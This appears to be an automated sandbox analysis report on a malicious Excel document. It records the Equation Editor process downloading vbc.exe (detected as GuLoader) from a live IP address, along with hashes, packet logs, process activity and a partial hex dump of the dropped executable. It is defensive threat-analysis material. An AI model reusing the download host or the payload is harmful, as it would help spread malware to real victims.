          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):122880
          Entropy (8bit):6.286624517223784
          Encrypted:false
          SSDEEP:1536:yzqGcUKFGnMrpxAcbsasHpL9T8oOmhfIRorEjZyZt:fcnM1rQa2dRPrEtyZt
          MD5:451E4CD68C69C2C8B8FC93AD02E8754A
          SHA1:B87D041383FA59A21BFF9666756EFA2784282199
          SHA-256:E406C6674E19F2F3368E26AD4E6D672B190EA5DF8CB1B5E95C9E22FB8C80738B
          SHA-512:FE42A6AFBD37EC5D20EC0C22153489EE0CA4A636FE8312DBF9554BEBE7C6D3D0E9AD602C3A746304F150561650FB2A887CFC10B3AD727A2FAB0A72A5A9D11911
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: Virustotal, Detection: 36%, Browse
          • Antivirus: ReversingLabs, Detection: 21%
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......K.....................@....................@.................................`u......................................$...(...........................................................................(... .......L............................text...`........................... ..`.data...............................@....rsrc............ ..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

          Static File Info

          General

          File type:CDFV2 Encrypted
          Entropy (8bit):7.989085616874321
          TrID:
          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
          File name:#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx
          File size:604672
          MD5:4a1d13469a6c817242e8b567bf34ab9a
          SHA1:a0d54f6c1205defad5f31cadf3393880e7c4c862
          SHA256:65514d1bcd58f206fbc6339c7893a4dc5fb3e7de39177038eac73906ec5c622c
          SHA512:a89649b90fe5900f3a014d84cee247df5ee514066bc2b58b968eea203d5290db6964aa5e6f5169cd4830121b0044c620c55db1089bb6c73c1af18f7a82729bf8
          SSDEEP:12288:qZLku7r1BAIE1ZoW3Y86UpOSHnSN3YfPwllSoaDuze:qFTrTVE1ZaMQSSWHwMDX
          File Content Preview:........................>......................................................................................................................................................................................................................................

          File Icon

          Icon Hash:e4e2aa8aa4b4bcb4

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Sep 15, 2021 11:06:58.303368092 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.414326906 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.414500952 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.415296078 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.527717113 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.527765036 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.527795076 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.527822018 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.527827978 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.527884960 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.527894020 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.527899981 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.639437914 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.639503956 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.639558077 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.639612913 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.639638901 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.639668941 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.639679909 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.639683962 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.639719963 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.639729977 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.639784098 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.639786959 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.639862061 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.639868021 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.639909983 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.751514912 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.751585960 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.751637936 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.751701117 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.751755953 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.751758099 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.751780033 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.751806974 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.751808882 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.751848936 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.751859903 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.751893997 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.751910925 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.751948118 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.751961946 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.752000093 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.752012968 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.752074003 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.752083063 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.752116919 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.752137899 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.752180099 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.752190113 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.752227068 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.752237082 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.752274036 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.752285957 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.752324104 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.752332926 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.752370119 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.754930973 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.863239050 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863287926 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863311052 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863333941 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863356113 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863379002 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863401890 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863421917 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.863425016 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863445997 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.863446951 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863451004 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.863464117 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.863468885 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863487005 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.863502026 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.863915920 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863938093 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863957882 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863976955 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.863977909 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.863996029 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.864001989 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.864012003 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.864025116 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.864036083 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.864044905 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.864053965 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.864065886 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.864069939 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.864085913 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.864099979 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.864105940 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.864115000 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.864126921 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.864140034 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.864145994 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.864159107 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.864168882 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.864176035 CEST4916580192.168.2.2223.95.85.181
          Sep 15, 2021 11:06:58.864192009 CEST804916523.95.85.181192.168.2.22
          Sep 15, 2021 11:06:58.864204884 CEST4916580192.168.2.2223.95.85.181

          HTTP Request Dependency Graph

          • 23.95.85.181

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.224916523.95.85.18180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          TimestampkBytes transferredDirectionData
          Sep 15, 2021 11:06:58.415296078 CEST0OUTGET /0789/vbc.exe HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: 23.95.85.181
          Connection: Keep-Alive
          Sep 15, 2021 11:06:58.527717113 CEST1INHTTP/1.1 200 OK
          Date: Wed, 15 Sep 2021 09:06:58 GMT
          Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
          Last-Modified: Wed, 15 Sep 2021 06:03:24 GMT
          ETag: "1e000-5cc0274c3638e"
          Accept-Ranges: bytes
          Content-Length: 122880
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/x-msdownload
          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 8b b7 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 a0 01 00 00 40 00 00 00 00 00 00 ac 17 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 01 00 00 10 00 00 60 75 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 a2 01 00 28 00 00 00 00 d0 01 00 f6 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 97 01 00 00 10 00 00 00 a0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 11 00 00 00 b0 01 00 00 10 00 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f6 16 00 00 00 d0 01 00 00 20 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#BBBL^B`BdBRichBPELK@@`u$(( L.text` `.data@.rsrc @@IMSVBVM60.DLL


          Code Manipulations

          Statistics

          Behavior

          Click to jump to process

          System Behavior

          General

          Start time:11:06:26
          Start date:15/09/2021
          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Imagebase:0x13f3b0000
          File size:28253536 bytes
          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          General

          Start time:11:06:49
          Start date:15/09/2021
          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Wow64 process (32bit):true
          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Imagebase:0x400000
          File size:543304 bytes
          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:11:06:51
          Start date:15/09/2021
          Path:C:\Users\Public\vbc.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\Public\vbc.exe'
          Imagebase:0x400000
          File size:122880 bytes
          MD5 hash:451E4CD68C69C2C8B8FC93AD02E8754A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Visual Basic
          Yara matches:
          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security
          Antivirus matches:
          • Detection: 100%, Joe Sandbox ML
          • Detection: 36%, Virustotal, Browse
          • Detection: 21%, ReversingLabs
          Reputation:low

          General

          Start time:11:08:09
          Start date:15/09/2021
          Path:C:\Users\Public\vbc.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\Public\vbc.exe'
          Imagebase:0x400000
          File size:122880 bytes
          MD5 hash:451E4CD68C69C2C8B8FC93AD02E8754A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
          Reputation:low

          Disassembly

          Code Analysis

          Reset < >